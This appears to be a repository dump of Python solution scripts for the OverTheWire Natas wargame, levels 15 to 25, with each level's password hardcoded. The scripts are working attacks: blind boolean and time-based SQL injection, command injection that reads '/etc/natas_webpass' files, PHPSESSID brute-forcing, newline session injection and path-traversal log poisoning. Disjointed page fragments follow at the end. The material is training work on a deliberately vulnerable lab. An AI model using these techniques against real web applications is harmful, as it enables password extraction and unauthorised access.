params={"username": username} 16 | ) 17 | if "This user exists" in r.text: 18 | charset_1 += c 19 | print ('CSET: ' + charset_1.ljust(len(charset_0), '*')) 20 | 21 | password = "" 22 | while len(password) != 32: 23 | for c in charset_1: 24 | t = password + c 25 | username = ('natas16" AND password LIKE BINARY "' + t +'%" "') 26 | r = requests.get(target, 27 | auth=('natas15','AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), 28 | params={"username": username} 29 | ) 30 | if "This user exists" in r.text: 31 | print ('PASS: ' + t.ljust(32, '*')) 32 | password = t 33 | break 34 | 35 | -------------------------------------------------------------------------------- /overthewire/natas/scripts/natas16.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | target = 'http://natas16.natas.labs.overthewire.org' 4 | charset_0 = ( 5 | '0123456789' + 6 | 'abcdefghijklmnopqrstuvwxyz' + 7 | 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 8 | ) 9 | 10 | p = '' 11 | i = 0 12 | while len(p) != 32: 13 | while i < len(charset_0): 14 | c = charset_0[i] 15 | needle = ('$(grep -E ^%s%c.* /etc/natas_webpass/natas17)Africans' % (p, c)) 16 | r = requests.get(target, 17 | auth=('natas16','WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'), 18 | params={"needle": needle} 19 | ) 20 | if "Africans" not in r.text: 21 | p += c 22 | print ('P: ' + p.ljust(32, '*')) 23 | i = 0 24 | else: 25 | i += 1 26 | 27 | -------------------------------------------------------------------------------- /overthewire/natas/scripts/natas17.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | pwd_len = 32 4 | 5 | charset_0 = ( 6 | '0123456789' + 7 | 'abcdefghijklmnopqrstuvwxyz' + 8 | 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 9 | ) 10 | charset_1 = '' 11 | 12 | target = 'http://natas17.natas.labs.overthewire.org' 13 | auth=('natas17','8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw') 14 | sleep_time = 15 15 | 16 | for c in charset_0: 17 | username = 'natas18" AND IF(password LIKE BINARY "%%%c%%",SLEEP(%d), 1)#' % (c, sleep_time) 18 | r = requests.get(target, auth=auth, params={"username": username} 19 | ) 20 | s = r.elapsed.total_seconds() 21 | if s >= sleep_time: 22 | charset_1 += c 23 | print ('C: ' + charset_1.ljust(len(charset_0), '*')) 24 | 25 | print "" 26 | 27 | password = "" 28 | while len(password) != pwd_len: 29 | for c in charset_1: 30 | t = password + c 31 | username = 'natas18" AND IF(password LIKE BINARY "%s%%",SLEEP(%d), 1)#' % (t, sleep_time) 32 | r = requests.get(target, auth=auth, params={"username": username} 33 | ) 34 | s = r.elapsed.total_seconds() 35 | if s >= sleep_time: 36 | print ('P: ' + t.ljust(pwd_len, '*')) 37 | password = t 38 | break 39 | -------------------------------------------------------------------------------- /overthewire/natas/scripts/natas18.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | target = 'http://natas18.natas.labs.overthewire.org' 4 | auth = ('natas18','xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP') 5 | params = dict(username='admin', password='s3cr3t') 6 | cookies = dict() 7 | 8 | max_s_id = 640 9 | s_id = 1 10 | while s_id <= max_s_id: 11 | print "Trying with PHPSESSID = " + str(s_id) 12 | cookies = dict(PHPSESSID=str(s_id)) 13 | r = requests.get(target, auth=auth, params=params, cookies=cookies) 14 | if "You are an admin" in r.text: 15 | print r.text 16 | break 17 | s_id += 1 18 | -------------------------------------------------------------------------------- /overthewire/natas/scripts/natas19.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import requests 4 | import sys 5 | 6 | target = 'http://natas19.natas.labs.overthewire.org' 7 | auth = ('natas19','4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs') 8 | params = dict(username='admin', password='s3cr3t') 9 | cookies = dict() 10 | 11 | x = 0x0 12 | y = 0x0 13 | z = 0x0 14 | 15 | 16 | while x <= 0xf: 17 | while y <= 0xf: 18 | while z <= 0xf: 19 | phpsessid = (('3%s3%s3%s2d61646d696e') % 20 | (hex(x)[2:], hex(y)[2:], hex(z)[2:])) 21 | cookies['PHPSESSID'] = phpsessid 22 | print 'Trying with: %s' % phpsessid 23 | r = requests.get(target, auth=auth, params=params, cookies=cookies) 24 | if "You are logged in as a regular user." not in r.text: 25 | print r.text 26 | sys.exit(0) 27 | z += 1 28 | y += 1 29 | z = 0x0 30 | x += 1 31 | y = 0x0 32 | z = 0x0 33 | 34 | sys.exit(1) 35 | -------------------------------------------------------------------------------- /overthewire/natas/scripts/natas19_stats.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import requests 4 | import os.path 5 | import sys 6 | 7 | def collect_stat(phpsessid, sess_id): 8 | for i in xrange(0, len(sess_id)): 9 | char_at_pos = phpsessid[i] 10 | char_at_pos[sess_id[i]] += 1 11 | 12 | def get_max(chars={}): 13 | max_freq = 0 14 | max_char = 'a' 15 | for c in chars: 16 | if chars[c] >= max_freq: 17 | max_freq = chars[c] 18 | max_char = c 19 | return max_char, max_freq 20 | 21 | def print_stat(phpsessid, n_captures): 22 | i = 0 23 | for c in phpsessid: 24 | l, f = get_max(c) 25 | print ((" char at position %2.1d of PHPSESSID is '%c' with accurancy %2.2f%%") % 26 | (i, l, (f*100)/n_captures)) 27 | i += 1 28 | 29 | target = 'http://natas19.natas.labs.overthewire.org' 30 | auth = ('natas19','4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs') 31 | params = dict(username='admin', password='s3cr3t') 32 | cookies = dict() 33 | 34 | # collects PHPSESSIDs 35 | filename = './phpsessids.txt' 36 | i_max = 300 37 | i = 0 38 | 39 | if os.path.exists(filename) is False: 40 | f = open(filename, 'a') 41 | print 'Collecting data (%d requests)' % i_max 42 | while i <= i_max: 43 | r = requests.get(target, auth=auth, params=params, cookies=cookies) 44 | f.write('%s\n' % r.cookies['PHPSESSID']) 45 | i += 1 46 | sys.stderr.write('.') 47 | f.close() 48 | sys.stderr.write('\n\n') 49 | 50 | # analyses collected IDs 51 | lens = {} 52 | ids = [] 53 | with open(filename) as f: ids = f.readlines() 54 | tot = len(ids) 55 | 56 | for id in ids: 57 | k = str(len(id[:-1])) 58 | if k in lens: 59 | lens[k] += 1 60 | else: 61 | lens[k] = 1 62 | 63 | print "Just a simple analysis: " 64 | for k in lens: 65 | print (' PHPSESSIDs with %s chars: %2.2f%%') % (k, (int(lens[k]) * 100)/tot) 66 | 67 | print "" 68 | 69 | # analyses chars frequencies 70 | sys.stdout.write('Chose length: ') 71 | l = int(raw_input()) 72 | 73 | phpsessid = [] 74 | 75 | for i in xrange(0, l): 76 | phpsessid.append({'0': 0, '1': 0, '2': 0, '3': 0, '4': 0, '5': 0, '6': 0, 77 | '7': 0, '8': 0, '9': 0, 'a': 0, 'b': 0, 'c': 0, 'd': 0, 78 | 'e': 0, 'f': 0}) 79 | 80 | n_captures = 0 81 | 82 | if l is not None: 83 | for id in ids: 84 | if len(id[:-1]) == l: 85 | collect_stat(phpsessid, id[:-1]) 86 | n_captures += 1 87 | print "\nWith %d captures" % i_max 88 | print_stat(phpsessid, n_captures) 89 | -------------------------------------------------------------------------------- /overthewire/natas/scripts/natas20.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | target = 'http://natas20.natas.labs.overthewire.org' 4 | auth = ('natas20', 'eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF') 5 | 6 | print "#" 7 | print "# FIRST REQUEST" 8 | print "#" 9 | params = dict(name='admin\nadmin 1', debug='') 10 | cookies = dict() 11 | r = requests.get(target, auth=auth, params=params, cookies=cookies) 12 | phpsessid = r.cookies['PHPSESSID'] 13 | print r.text 14 | 15 | print "\n\n" 16 | print "#" 17 | print "# SECOND REQUEST" 18 | print "#" 19 | params = dict(debug='') 20 | cookies = dict(PHPSESSID=phpsessid) 21 | r = requests.get(target, auth=auth, params=params, cookies=cookies) 22 | print r.text 23 | -------------------------------------------------------------------------------- /overthewire/natas/scripts/natas21.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | target = 'http://natas21-experimenter.natas.labs.overthewire.org' 4 | auth = ('natas21', 'IFekPyrQXftziDEsUr3x21sYuahypdgJ') 5 | 6 | params = dict(debug='', submit='', admin=1) 7 | cookies = dict() 8 | r = requests.get(target, auth=auth, params=params, cookies=cookies) 9 | phpsessid = r.cookies['PHPSESSID'] 10 | print r.text 11 | 12 | target = 'http://natas21.natas.labs.overthewire.org' 13 | params = dict(debug='') 14 | cookies = dict(PHPSESSID=phpsessid) 15 | r = requests.get(target, auth=auth, params=params, cookies=cookies) 16 | print r.text 17 | -------------------------------------------------------------------------------- /overthewire/natas/scripts/natas25.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import requests 4 | 5 | target = 'http://natas25.natas.labs.overthewire.org' 6 | auth = ('natas25', 'GHF6X7YwACaYYssHVY05cFq83hRktl4c') 7 | 8 | cookies = dict() 9 | # this forces the application to call logRequest() function 10 | params = dict(lang='natas_webpass') 11 | # this put contents of "/etc/natas_webpass/natas26" in each log entry 12 | headers = { 13 | "User-Agent": '' 14 | } 15 | 16 | # executes a first request to get the session id 17 | r = requests.get(target, auth=auth, params=params, cookies=cookies, headers=headers) 18 | phpsessid=r.cookies['PHPSESSID'] 19 | log_file = '/tmp/natas25_%s.log' % phpsessid 20 | cookies = dict(PHPSESSID=phpsessid) 21 | 22 | # "..././" is escaped to "../", we'll exploit it reach log_file 23 | params = dict(lang=('..././..././..././..././..././' + log_file)) 24 | r = requests.get(target, auth=auth, params=params, cookies=cookies, headers=headers) 25 | print r.text 26 | 27 | --------------------------------------------------------------------------------

You did it again! Why did they blacklist you anyway?

YOUR NAME HERE

GotTheMilk

Hello, Mary Jane.

Not Found

Not Found

natas4

natas5

natas7

natas11

natas12

natas12

natas13

natas14

natas14

natas18

natas19

natas20

natas20

natas22

natas23